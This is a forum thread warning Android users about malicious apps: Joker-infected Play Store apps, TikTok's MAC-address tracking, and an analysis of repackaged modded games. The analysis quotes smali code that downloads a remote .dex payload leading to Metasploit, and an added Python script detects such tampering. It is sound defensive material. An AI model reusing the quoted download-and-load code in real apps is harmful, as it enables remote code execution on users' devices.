Keep yourself informed!
Sep 10th, 2019, 3:05 pm
Alert for new malware detected installed in dozens of applications in the Android Play Store has hit the security company CSIS.
Specifically, the company found that the Joker software is hidden in these applications, which is extremely insidious and ... costly.
Joker secretly signs application users up for subscription services, so users pay for services they don't use.
Google dumped the infected apps out of the Play Store, but any users who downloaded them should uninstall them right away.

Advocate Wallpaper
Age Face
Altar Message
Antivirus Security - Security Scan
Beach Camera
Board picture editing
Certain Wallpaper
Climate SMS
Collate Face Scanner
Cute Camera
Dazzle Wallpaper
Declare Message
Display Camera
Great VPN
Humour Camera
Ignite Clean
Leaf Face Scanner
Mini Camera
Print Plant scan
Rapid Face Scanner
Reward Clean
Ruddy SMS
Soby Camera
Spark Wallpaper

Extra apps that have been reported that are loaded with adware:

CM Security Applock AntiVirus
Free VPN Master
Funny Sweet Beauty Selfie Camera
HotSpotVPN
Secure VPN
Sun Pro Beauty Camera

Before make a new topic please:
- Read our Site Rules.
- Use Search Bar for avoid double posts.
- Support developers!
- Enjoy Mobilism!
...and remember: don't take life too seriously...
Sep 21st, 2019, 8:02 pm
Add to that list:
HotSpotVPN
Free VPN Master
Secure VPN
CM Security Applock AntiVirus
Sun Pro Beauty Camera
Funny Sweet Beauty Selfie Camera
Loaded with adware.
Sep 25th, 2019, 3:38 pm
I'm glad that I don't install any of this :shock:
Last edited by AHSANHABIBMUAZ on Sep 25th, 2019, 3:40 pm, edited 1 time in total.
Nov 14th, 2019, 2:31 pm
I was using ai.type keyboard Plus + Emoji for some time :shock: :shock:
Checking my phone rn...
Thank you for the article
Jan 10th, 2020, 1:28 pm
Lucky, I don't have any of those apps installed.

Instagram: @Drasik29 :-D
Feb 2nd, 2020, 11:24 pm
Malwarebytes has a good front end to detect this stuff at download and again at install. Saved my arse many a time...

... knowledge is the thesis of rebellion!
Aug 14th, 2020, 11:59 am
Today the TikTok app has been banned and removed from iOS and Android (Play Store) for security reasons, so be aware!
Today's article from a trusted source:
With the US accusing TikTok of spying on American citizens and TikTok itself denying any involvement with the Chinese government, a new investigation is coming to make the company's position even more difficult. According to the Wall Street Journal, TikTok tracked the MAC addresses of Android users by the end of last year.
Unlike cookies which can be easily deleted, MAC addresses are unique to each device and are often used in digital advertising to identify devices. TikTok reportedly took advantage of a known Android security vulnerability and stored MAC addresses for at least 15 months. It even used an extra level of encryption to hide this collection.
This data was collected, of course, without the user's consent, in clear violation of Google's terms of use. A Google spokesman said the company was investigating the Journal's findings, but did not comment on the security breach that allowed applications to collect MAC addresses.
TikTok, in turn, did not deny the allegations or answer specific questions and instead issued the following statement stating that the application no longer uses such tactics.
Apr 12th, 2021, 11:28 am
Info by @ill420smoker

Hey guys,

I've noticed a dangerous trend in our Android section in the last few months and wanted to share my findings.

While viewing the Android>Games section I would often see the following:
- A brand new user
-- posting perfect topics
-- posting attractive titles
-- posting a few topics in succession
-- never returning to the forum

Of course this immediately sends up a red flag to me.

Upon downloading and inspecting a few of these apps I've noticed there are added .smali files (aka Java classes), which is another red flag. At first I believed this was only ad injection, but it turns out to be much worse.

Take this topic for example:
Idle Miner Tycoon v3.42.0 (Mod Money)
https://forum.mobilism.org/viewtopic.php?f=408&t=4225643

APK:
https://sharemods.com/3ybom9202awx/idle_miner_mod_3.42.0.apk.html

The source of the original mod is AN1.com, and while AN1 does inject their games with adware to profit from their mods this is much more dangerous.

Notable changes:
- Changed startup activity
- Added permissions to Manifest:
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.START_TASKS_FROM_RECENTS"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.REAL_GET_TASKS"/>
<uses-permission android:name="android.permission.REORDER_TASKS"/>
<uses-permission android:name="android.permission.GET_DETAILED_TASKS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>

The new startup activity downloads another .dex file from the internet:
.method protected varargs a([Ljava/lang/Void;)Ljava/lang/Object;
    .locals 6

    :try_start_0
    new-instance p1, Ljava/net/URL;

    const-string v0, "https://dexapt.com/a/2021-04-11.dex"

    invoke-direct {p1, v0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V

    invoke-virtual {p1}, Ljava/net/URL;->openStream()Ljava/io/InputStream;
...

The website 'dexapt.com' has recently changed from a superficial tech and news website to an app & game site. If you follow the link to https://dexapt.com/a/ you'll see the various .dex files hosted here. Notice the coded .dex file has not been posted yet. This allows the app to run inconspicuously until they do post it. As some users have reported, Chrome will launch weird webpages after running these apps.

Once the .dex (8k) is available and downloaded it will also download a .dex file (20k) which contains the Metasploit code. After the Metasploit framework is installed, an attacker can remotely execute the following :!:
Image

Moreover, the VirusTotal report for these infected apps/games is clean:
https://www.virustotal.com/gui/file/30b ... af/details
(Notice it's already spread to a2zapk.com)

Metasploit is likely the worst possible malware that a user can be infected with.

An additional search term:
DexClassLoader

I uploaded '2021-03-25.dex' to VT. The two interesting strings are the short links that are launched by Chrome.
https://www.virustotal.com/gui/file/80d ... /detection

- ill420smoker
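
The checks described in the post above (added permissions, a changed startup activity, a hard-coded .dex download and the DexClassLoader search term) can be automated when you have both the original release and the repackaged copy. The following is an added example, not part of the original post; it assumes both APKs were decoded with apktool, and the package names, file paths and URL in the sample data are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
DEX_URL = re.compile(r'const-string(?:/jumbo)?\s+\w+,\s*"(https?://[^"]+\.dex)"')
LOADER = "Ldalvik/system/DexClassLoader;"

def permissions(manifest_xml):
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID + "name") for e in root.iter("uses-permission")}

def launcher(manifest_xml):
    """Name of the activity that declares the LAUNCHER intent-filter category."""
    root = ET.fromstring(manifest_xml)
    for act in root.iter("activity"):
        cats = {c.get(ANDROID + "name") for c in act.iter("category")}
        if "android.intent.category.LAUNCHER" in cats:
            return act.get(ANDROID + "name")
    return None

def compare(original_manifest, suspect_manifest, suspect_smali):
    """Diff a repackaged APK (decoded with apktool) against the original release."""
    report = {
        "added_permissions": sorted(permissions(suspect_manifest) - permissions(original_manifest)),
        "launcher_changed": launcher(original_manifest) != launcher(suspect_manifest),
        "dex_urls": [], "uses_dexclassloader": [],
    }
    for path, text in suspect_smali.items():  # path -> smali source text
        report["dex_urls"] += [(path, url) for url in DEX_URL.findall(text)]
        if LOADER in text:
            report["uses_dexclassloader"].append(path)
    return report

# Constructed sample inputs (not the real app's files); all names are hypothetical.
NS = 'xmlns:android="http://schemas.android.com/apk/res/android"'
def _manifest(perms, main):
    p = "".join(f'<uses-permission android:name="android.permission.{x}"/>' for x in perms)
    return (f'<manifest {NS}>{p}<application><activity android:name="{main}">'
            '<intent-filter><category android:name="android.intent.category.LAUNCHER"/>'
            '</intent-filter></activity></application></manifest>')

ORIGINAL = _manifest(["INTERNET"], "com.example.game.MainActivity")
SUSPECT = _manifest(["INTERNET", "RECEIVE_BOOT_COMPLETED", "WRITE_SETTINGS"], "com.example.a.Start")
SMALI = {"smali/com/example/a/Start$1.smali":
         'const-string v0, "https://example.invalid/a/payload.dex"\n'
         'new-instance v1, Ldalvik/system/DexClassLoader;\n'}

if __name__ == "__main__":
    print(compare(ORIGINAL, SUSPECT, SMALI))
```

A clean VirusTotal result does not contradict a non-empty report here: the diff flags structural changes relative to the original release, which signature-based scanners do not see.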
Jul 19th, 2021, 4:33 pm
Info by @(GL)Nihon

It has come to my attention that some people might get some *false positive* warnings while using Huawei devices

As seen: https://forum.mobilism.org/viewtopic.php?f=430&t=4249177&p=8793638#p8793638

See picture:

https://imgur.com/a/rxLox27

Searching through the net that report APK:RepSandbox[trj]||ar

https://www.virustotal.com/gui/file/cfd ... /detection

Well need to look into this

Reports from Huawei:

Meanwhile Huawei really do not give much of an answer except:
Hi fuchs.sigma, thank you for reaching Huawei! we do apologized for any inconvenience caused to you. Accessing unauthorized ads or links may infect your device with Trojans and malware that may secretly install themselves and steal your personal data. Running a virus scan can locate and remove potential threats on your Phone. Therefore, we would suggest to use Phone Manager to scan virus.


And some other sort of direction to pm them rather than giving them any real indication why the app is flagged..

So if you're unsure of using the app uninstall it and wait for another version.

But in the other have even tasker have gotten the app as flagged
Jul 19th, 2021, 5:43 pm
To further add the app itself is clean (intermediate)

See https://www.virustotal.com/gui/file/56c ... 7d/summary
Human Japanese

https://www.virustotal.com/gui/file/d8a ... 57/summary

But the users' uploads have more warnings which aren't from the original apk

Please do note that the red flag is only due to debug/test keys

Welcome to the world Nihon Jr 2016-10-15 08.39pm <3

Currently a bit of here. Sorry